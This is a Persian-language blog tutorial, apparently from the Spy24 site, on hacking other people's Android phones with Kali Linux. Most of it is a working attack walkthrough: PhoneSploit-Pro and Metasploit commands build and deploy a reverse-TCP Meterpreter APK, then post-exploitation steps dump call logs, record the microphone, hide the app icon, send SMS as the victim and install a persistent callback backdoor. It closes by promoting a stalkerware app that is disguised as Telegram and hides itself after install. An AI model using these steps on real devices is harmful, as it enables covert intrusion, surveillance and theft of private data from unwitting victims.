هک اندروید با استفاده از کالی لینوکس (آموزش Kali Linux)
به درخواست بسیاری از کاربران، موضوع این مقاله آموزش هک اندروید با استفاده از کالی لینوکس می باشد. ما در این مقاله از سایت اسپای۲۴ برای شما به آموزش روش هک اندروید با کالی می پردازیم و مطالبی درباره نحوه استفاده کد های لینوکس برای هم برای شما قرار می دهیم. شما برای فراگیری این آموزش، تا انتهای این مقاله همراه ما باشید.
هک اندروید با استفاده از کالی لینوکس:
سیستم عامل اندروید یکی از سیستم عامل های (OS) های محبوب در مجموع جهان میباشد که روزانه افراد بسیاری از ان استفاده می نمایند این OS برای دستگاه های تلفن همراه طراحی شدهاست البته قابلیت و امکان نصب ان در هر سیستمی موجود است. به همین دلیل محبوبیت بخش اعظمی دارد و افراد زیادی در کشورایران و عالم از ان استفاده میکنند دراین اموزش با شیوه های تست نفوذ اندروید از طریق کالی لینوکس و هک اندروید با استفاده از کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خوا هیم کرد.
بیشتر بخوانید:
دانلود کالی لینوکس در وب سایت رسمی:
https://www.kali.org/docs/introduction/download-official-kali-linux-images/
نیازمندی ها:
- کالی لینوکس
- Metasploit
- Python3: Python 3.10 یا جدیدتر
- ADB: Android Debug Bridge (ADB) از Android SDK Platform Tool
- Scrcpy
- Nmap
هک گوشی اندروید با ابزار PhoneSploit در کالی
نصب و پیکربندی
مرحله 1: در سیستم لینوکسی خود، به دایرکتوری دسکتاپ حرکت کنید و با وارد کردن دستور زیر، مخزن GitHub را کلون کنید.
cd Desktop
git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git
مرحله 2: حالا پس از کلون کردن به PhoneSploit-Pro، به دایرکتوری ابزار حرکت کرده و فایلهای داخل آن را لیست کنید.
cd PhoneSploit-Pro
ls
مرحله 3: با وارد کردن دستور زیر، ابزار را اجرا کنید.
sudo python3 phonesploitpro.py
پیکربندی برای دستگاههای اندروید
مرحله 1: فعالسازی گزینههای توسعهدهنده
- تنظیمات را باز کنید.
- به بخش «درباره تلفن» بروید.
- شماره ساخت را پیدا کنید.
- روی شماره ساخت ۷ بار کلیک کنید.
- الگو، پین یا رمز عبور خود را وارد کنید تا منوی گزینههای توسعهدهنده فعال شود.
- منوی گزینههای توسعهدهنده اکنون در منوی تنظیمات شما ظاهر میشود.
مرحله 2: فعالسازی اشکالزدایی از طریق USB
- تنظیمات را باز کنید.
- به بخش «سیستم > گزینههای توسعهدهنده» بروید.
- پایین بروید و اشکالزدایی از طریق USB را فعال کنید.
بعد از فعالسازی اشکالزدایی از طریق USB، دستگاه را با کامپیوتر میزبان با یک کابل USB وصل کنید.
بعد از اتصال دستگاه اندروید به کامپیوتر، به ترمینال ابزار بازگردید:
استفاده از ابزار PhoneSploit
مثال 1: آینهسازی و کنترل دستگاه
مرحله 1: بیایید ابتدا دستگاه را آینهسازی و کنترل کنیم، گزینه ۵ را برای آن انتخاب کنید.
مرحله 2: سپس، از شما برای کیفیت پخش پرسیده میشود. برترین کیفیت را با انتخاب گزینه ۱ انتخاب کنید.
پنجره ای بر روی دستگاه اندروید شما ظاهر میشود که از شما درخواست اجازه اشکالزدایی از طریق USB میکند.
وقتی روی اجازه کلیک میکنید، شروع به پخش دستگاه شما به سیستم خواهد کرد.
مثال 2: هک دستگاه یا کوشی
حالا بیایید به ویژگی دیگری از این ابزار برویم که بهترین آنها است، یعنی هک دستگاه.
مرحله 1: گزینه ۱۵ را در منوی اصلی وارد کنید، یعنی هک دستگاه. (تلفن اندرویدی ما باید به سیستم متصل شود).
Metasploit-Framework راهاندازی خواهد شد. برای ۱۰ ثانیه منتظر بمانید.
مرحله 2: ادامه فرآیند ایجاد فایل APK با استفاده از ابزار.
مرحله 3: ما میتوانیم LHOST و LPORT را با تایپ M یا فقط فشردن Enter اصلاح کنیم. پس از آن، از شما برای راهاندازی پایگاه داده برای ذخیره نمودن بار مفید پرسیده خواهد شد.
مرحله 4: اکنون ابزار شروع به نصب APK بار مفید روی دستگاه میکند. پنجرهای بر روی دستگاه اندرویدی شما ظاهر میشود که از شما برای اجازه نصب APK میپرسد.
مرحله 5: گزینه نصب هر چه دارید را انتخاب کنید یا میتوانید محافظت Google Play را در تنظیمات Google Play خاموش کنید تا از این مرحله عبور کنید.
بعد از نصب، ابزار اکنون برنامه را با درخواست مجوزهای مختلف باز میکند.
مرحله 6: اجازه دادن به تمام مجوزها و بر روی ادامه کلیک کنید تا APK بار مفید با موفقیت نصب شود.
مرحله 5: اکنون ابزار Metasploit-Framework راهاندازی میکند و جلسه Meterpreter به طور خودکار آغاز خواهد شد. حالا کابل USB را جدا کرده و به بهرهبرداری از دستگاه اندرویدی ادامه دهید.
مرحله 6: help را تایپ کنید و Enter را بزنید. تمام حملات ممکن به دستگاه لیست خواهند شد.
مرحله 7: dump_callog را تایپ کنید تا تاریخچه تماسهای دستگاه را بازیابی کرده و آن را در سیستمتان ذخیره کنید.
همانطور که میبینید، تاریخچه تماسها بازیابی و در یک فایل متنی ذخیره شده است.
مرحله 8: record_mic را تایپ کنید تا صدای اطراف دستگاه اندرویدی را ضبط کنید.
این مثالهایی از بهرهبرداری از دستگاه و کسب اطلاعات حساس درباره دستگاه اندرویدی بودند.
حملات بسیاری دیگری وجود دارند که میتوانید آنها را در منوی کمک Meterpreter مشاهده کنید.
میتوانید با تایپ دستور exit از جلسه خارج شوید.
هک اندروید با ارسال متاسپلویت:
متاسپلویت یک فریمورک قدرتمند تست نفوذ میباشد که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما دوستان ارائه دادیم ؛ البته به طور خلاصه ابزاری میباشد که در هر سیستم عاملی از جمله ویندوز قابل نصب میباشد و به طور پیشفرض در کالی لینوکس موجود است، و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود میباشد. و ما دراین اموزش با استفاده از یکیاز پیلود های ان یک فایل برای تست امنیت یا این که هک اندروید خوا هیم ساخت و ان را اجرا می کنیم.
در ابتدا با دستور زیر وارد متاسپلویت گردید
msfconsole
پس از کمی انتظار و باز شدن متا دستور پایین را برای تنظیم و ساخت apk وارد نمایید
use android/meterpreter/reverse_tcp
هم اکنون تنظیمات مرتبط با این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد فرمایید، توجه داشته باشید دراین بخش باید ای پی سرور خود را وارد نمائید در صورتی که از سرور استفاده نمیکنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در پن تست کور قرار داده شدهاست.
set LHOST 127.0.0.1
و یک پورت را برای اتصال تعیین فرمائید مثلا ما پورت ۶۰۶۰ را به کارگیری میکنیم
set LPORT 6060
درحال حاضر برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد نمائید
generate -f raw -o PentestCore.apk
دستور پایین را برای ایجاد اتصال بین پیلود وارد نمایید
use multi/handler
و پیلود ساخته شده را ست فرمایید ادرس پیلود در واقع ادرسی میباشد که در دستور اول وارد کرده ایم
set PAYLOAD android/meterpreter/reverse_tcp
دوباره تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد و در اخر برای اجرای کافیست دستور exploit را وارد فرمایید و تا نصب اپ اندروید تشکیلشده منتظر بمانید. پس از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا فرمائید یا این که از امکانات متاسپلویت برای ان استفاده نمایید.
درصورتی که که اندروید هدف روت گردیده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و داده ها حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.
3 دستور برای دسترسی پیدا کردن به گوشی اندروید قربانی:
دستورات بسیار زیادی بعد از دسترسی گرفتن از اندروید قربانی پیش روی شماست که میتوانید با استفاده از دستور help تمام دستورات را ببینید و از آنها استفاده نمائید، ولی درین قسمت از آموزش قصد داریم شمارا با ۳ دستور مهم و کاربردی آشنا کنیم .
دستور اولیه : hide_app_icon
با استفاده از این دستور میتوانید آیکن فایل مخرب خود را مخفی فرمایید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.
دستور دوم : check_root
با استفاده از دستور بالا میتوانید ورژن سیستم عامل اندروید هک گردیده خود را بررسی نمائید که ایا روت میباشد یا این که نه؟ تا اگر روت میباشد با استفاده از بکدوری که در ادامه انرا به شما معرفی خواهیم کرد دسترسی خود دائمی فرمایید.
دستور سوم : send_sms -d number -t ” body text sms ”
دستور بالا دستور بسیار جذابی میباشد که میتوانید با استفاده از این دستور با شماره قربانی یک sms به شماره مورد نظر خود ارسال فرمائید.
نکته : در قسمت number می بایست شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد نمایید و در قسمت text بایستی متن دلخواه خود را وارد فرمائید و سپس بر روی enter کلیک نمائید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.
ساخت بک دور بر روی اندروید قربانی:
در ابتدا بایستی با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را بررسی نمایید و در حالتی که اندروید تارگت شما روت بود میتوانید با ایجاد یک بکدور دسترسی خود را دائمی نمائید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :
/ cd
سپس درین مرحله می بایست با استفاده از دستور پایین به مسیر sdcard وارد گردید :
cd /sdcard
سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود فرمائید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت مو جود که با زبان bash درج شده میباشد را بر روی اندروید قربانی خود اپلود نمایید.
upload /root/Desktop/backdoor.sh /sdcard
توجه فرمایید که بایستی مسیر اسکریپت را به درستی وارد فرمایید تا عملیات اپلود به خوبی انجام شود. در مرحله بعدی بایستی با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید . سپس مجددا دو دستور زیر را وارد نمایید تا به محلی که در آن اسکریپت را آپلود نموده اید برسید :
/ cd
cd /sdcard
دراین قسمت بایستی با استفاده از دستور پایین اسکریپت را برای اجرا بکدور بعداز هک اندروید وارد نمائید :
sh lifetime.sh
در نهایت بایستی با استفاده از دستور reboot یک بار سیستم عامل اندروید قربانی را reboot نمایید ، سپس هنگامی که اندروید قربانی شما مجددا راه اندازی شما هر ۲۰ ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال مینماید که میتوانید از اکسپلویت مولتی هندلر استفاده نمایید و به دستگاه اندروید مورد نظر خود متصل گردید.
مهم ترین روش های افزایش امنیت در اندروید:
- از انتی ویروس های اورجینال اندرویدی استفاده کنید.
- از نصب برنامه های نامعتبر و کرک گردیده خود داری فرمایید.
- با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.
- از دریافت برنامه به غیر از پلی استور خود داری نمایید.
- بر روی هر ینکی کلیک نکنید و وارد وب سایت های نامعتبر نشوید.
- از انتی ویروس های فعال استفاده فرمایید که با نصب هر برنامه ان را اسکن نماید.
- دیتا های اصلی خود را در گوشی نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید.
- پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی گوشی مورد نفوذ قرار نگیرد.
امیدواریم از این اموزش هک اندروید با استفاده از کالی لینوکس و امنیت لذت برده باشید ، چناتنچه سوال یا این که پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال نمایید و در کوتا ترین زمان جواب داده خواهد شد پایدار باشید. متاسفانه از آنجایی که اندروید یک سیستم عامل متن باز است، امکان هک و نفوذ به آن نیز زیاد میباشد. این سیستم عامل به جهت متن باز بودن امکانات کاملی را برای توسعه دهندگان برنامه ها و سیستم عامل ها فراهم می آورد. سیستم عامل های متن باز معمولا دسترسی های بیشتری را برای کاربرانشان به وجود می آورند به همین دلیل بیش تر در معرض هک اندروید قرار میگیرد. سیستم عامل اندروید نیز در خطر انواع بدافزارها، ویروس ها و برنامه های هک برای آن نوشته شده میباشد.
امروز قصد داریم نکاتی را دربارهی شیوه های هک اندروید و راه های نفوذ بهاین سیستم عامل را بررسی کرده و در اختیار دوست داران قرار دهیم.
هک اندروید به چه شکل امکان پذیر میباشد ؟
در همین در آغاز، بدون اینکه بخواهیم شمارا گیج کنیم، بایستی بگوییم تمام دستگاهای الکترونیکی قابل هک شدن میباشند و دستگاه های اندرویدی نیز از این قاعده مستثنی نیستند. شیوه های هک موبایل اندروید بسیار متنوع و زیاد میباشد تا جایی که حتی افرادی که دانش چندانی در مورد برنامه نویسی و هک ندارند، باز هم میتوانند موبایل های اندروید را با چند راهکار ساده هک نمایند. این دستگاهای اندرویدی مانند اکثر ابزارهای الکترونیکی قابلیت و امکان هک شدن را دارند ولی شیوه های هک آن مختلف بوده و هر کس با توجه به توانایی های خود میتواند یک روش خاص را انتخاب کند. هر روشی نیز به ابزاری خاص نیازمند میباشد، کهاین ابزارها میزان دسترسی و کیفیت هک شمارا مشخص مینمایند.
شاخص ترین شیوه و ابزاری که یک هکر قادر است برای انجام هک اندروید از آن استفاده نماید، یک سیستم کامپیوتری مجهز به سیستم عامل لینوکس میباشد که از ورژن کالی لینوکس یا این که بکترک استفاده نماید. خبر بد برای دارندگان موبایل های اندروید این میباشد که سیستم عامل اندروید نیز بر اساس هسته سیستم عامل لینوکس طراحی شدهاست و همین عامل سبب میگردد پروسه هک اندروید بسیار ساده تر برای یک هکر حرفه ای صورت بپذیرد.
هک اندروید با روشهای گوناگون کالی لینوکس:
برای اینکه بتوان اقدام به هک اندروید با استفاده از کالی لینوکس را روی سیستم خود داشته باشید بعد از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom مینماید. با استفاده از این ابزار، هکر اقدام به ایجاد یک برنامه هک اندروید به صورت APK مینماید. برای ساخت چنین ابزاری هکر فقط نیاز دارد که دستور پایین را در محیط ترمینال لینوکس وارد کند.
فرمان فوق هکر به جای عبارت LHOST می تواند از نشانی آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده نماید. Name.apk اسم ابزاری میباشد که هکر آن را می سازد تا با آن اقدام به هک اندروید کند.
سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :
Msf>use exploit/multi/handler
Msf>set PAYLOAD android/meterpreter/reverse_tcp
Msf>set LHOST 192.168.1.35
Msf>set LPORT 443
اما این توشه در قسمت LHOST نیاز میباشد که آدرس سرور را وارد نماید. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید. هم اکنون هنگامی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک نماید و آن را اجرا نماید، عملیات هک با کالی لینوکس برد آمیز انجام می گردد. همانگونه که میبینید دراین شیوه هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورها هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید کند.
هک اندروید با برنامه های هک گوناگون:
همانطور که گفتیم ابزارهایی که برای هک استفاده میکنید میزان دسترسی و کیفیت عمل هک را تعیین میکند. یکی از دیگر از ابزارهایی که بسیار مورد استفاده هکرها به خصوص هکرهایی با سواد کمتر در این مورد قرار میگیرد، نرم افزارهای هک و نفوذ به اندروید میباشد.
این برنامه ها معمولا توسط هکرهای حرفه ای ساخته میگردند و هکرهای غیرحرفه ای و حتی افراد معمولی نیز از آن ها برای هک موبایل شخص موردنظرشان استفاده می نمایند. تعداد این برنامه ها آنقدر زیاد میباشد که انسان در انتخاب یک کدام از آنها ممکن میباشد حتی گیج شود. اما این اپلیکیشن ها برای اجرا و درست کار کردن نیازمند الزاماتی میباشند که برخی به سادگی در اختیار همه قرار نمی گیرند. در پی مقاله تعدای از نرم افزارهای هک را به اجمال معرفی خواهیم نمود.
هک اندروید با برنامه AndroRAT:
یک کدام از برنامه های معروف و پرطرفدار در این مورد که تاکنون بسیار موفق عمل کرده است ، برنامه AndroRAT است. اسم این اپلیکیشن مخفف عبارت دسترسی از راه دور به دستگاه اندرویدی میباشد. این برنامه به صورت رایگان در اختیار کاربرانش قرار گرفته میباشد و قابلیت و امکان هک گوشی از راه دور را نیز به آنان میدهد، همچنین با استفاده از این برنامه می توان اقدام به ارسال Sms بوسیله موبایل قربانی نمود. یکیاز ویژگی هایی که باعث محبوبیت این برنامه شدهاست، امکان تصویر برداری با استفاده از دوربین موبایل هدف میباشد.
اپلیکیشن هک اندروید zANTI:
بسیاری از اپلیکیشن ها می باشند که به نرم افزارهای هک معروفند ولی با هدف انجام تست نفوذ به سیستم طراحی و عرضه می گردند. اپلیکیشن zanty نیز یکی این نرم افزارهاست که به کارشناسان امنیت شبکه کمک مینماید در سریعترین حالت ممکن اقدام به شناسایی نقاط ضعف شبکه کنند. این برنامه هک اندروید به برنامه Backtrack تلفن همراه معروف هست، چراکه همچون سیستم عامل بک ترک لینوکس، ابزارهای مختلفی را در اختیار کاربران برای انجام عمل هک قرار میدهد و از طرفی قدرت فوق العاده ای نیز دارد.
برنامه کنترل اسیای۲۴
اسیای۲۴ یکیاز دیگر از برنامه هایی میباشد که میتواند کارهک اندروید با استفاده از کالی لینوکس، کنترل و هک گوشی شخص موردنظر شمارا انجام دهد. این برنامه با انگیزه نظارت بر فرزندان در فضای مجازی به وسیله سامانه کنترل فرزند طراحی و نوشته شده میباشد.
اسیای۲۴ در دو ورژن بدون دسترسی ( هک با شماره تلفن ) و با دسترسی ارائه میشود. که ولی ورژن جدید این برنامه نیز با اسم اسیای۲۴ منتشر گردیده که شما میتوانید آن را با آیکون دلخواهتان برای مثال تلگرام بدون فیلترشکن برای فرزندتان ارسال نمایید، به محض کلیک فرزند برروی لینک و پیوند ارسالی شما، برنامه به طور اتوماتیک نصب میشود و سپس از لیست نرم افزارها پنهان می گردد. قابلیت و امکان های منحصر به فردی کهاین نسخه ارائه داده میباشد، شنود و ضبط مکالمات فرزند و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند است.
کلام آخر…
ما در این مقاله به آموزش هک اندروید با استفاده از کالی لینوکس پرداختیم و گفتیم چگونه از طریق این ابزار می توانید به راحتی اقدام به هک اندروید دیگران نماید. شما می توانید برای آشنایی با 4 روش نفوذ به اندروید دیگران و مشاهده کد های لینوکس برای هک، این مقاله را تا انتها مطالعه نماید و نظرات خود را در بخش کامنت برای ما قرار دهید. سایت spy24 همراه همیشگی شماست تا همیشه بهترین آموزش ها را برای شما قرار دهد.